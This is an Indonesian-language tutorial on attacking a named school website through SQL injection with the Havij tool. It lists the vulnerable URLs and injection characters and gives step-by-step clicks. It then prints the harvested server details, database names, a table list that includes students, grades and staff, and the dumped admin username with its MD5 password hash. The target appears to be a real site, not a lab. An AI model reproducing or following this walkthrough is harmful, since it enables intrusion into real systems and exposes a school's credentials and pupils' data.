Masuk ke havij gunakan alamat yang kita serang tadi bisa menggunakan

http://smpn18bkl.sch.id/berita.php?id=-1 atau yang telah saya trobos lebih dalam lagi http://smpn18bkl.sch.id/berita.php?p=lengkap&id=1'

hilangkan tanda – untuk yang pertama dan ‘ untuk yang kedua dan tampak seperti di gambar untuk sql injection menggunakan havij

 

Lalu setelah memasukan web url klik analyze tunggu sampai selesai.

Setelah selesai anda buka menu info dan klik get dan tunggu hingga selesai, jika

selesai maka informasi yang kita dapatkan adalah
Target: http://smpn18bkl.sch.id/berita.php?p=lengkap&id=1'
Host IP: 49.156.21.35
Web Server: Apache
Powered-by: PHP/5.2.17
DB Server: MySQL
Resp. Time(avg): 128 ms

Current User: smpn18bk_userdb@localhost

Sql Version: 5.0.96-community
Current DB: smpn18bk_dbase
System User: smpn18bk_userdb@localhost
Host Name: pasai.magnethost.asia
Installation dir: /
DB User: 'smpn18bk_userdb'@'localhost'
Data Bases: information_schema
smpn18bk_dbase
Data Bases: information_schema
smpn18bk_dbase

Selanjutnya adalah klik tables untuk mendapatkan informasi dari database

smpn18bk_dbase

Pertama-tama adalah klik get dbs untuk mendapatkan nama database, selanjutnya

adalah Untuk mencari tables anda centang table smpn18bk_base klik get tables
setelah itu maka akan muncul tables lebih detail lihat gambar.

 

Hasil keseluruhan isi database :

siswa
profil
pengumuman
pegawai_str
nilai
mapel
kelas
kategori_galeri
kategori_berita
kaldik
guru_staf
galeri

bukutamu

berita
agenda
admin

Setelah itu kita centang tables admin lalu klik get coloums untuk mendapatkan

username, password, id dan setelah itu akan muncul password dalam bentuk md5,
username, id centang semua dan klik get data.

Hasil dari gambar dump tables admin tersebut dari havij

Dan dapat hasil sebagai berikut

Username : admin
Password dalam bentuk md5 : 25f9e794323b453885f5181f1b624d0b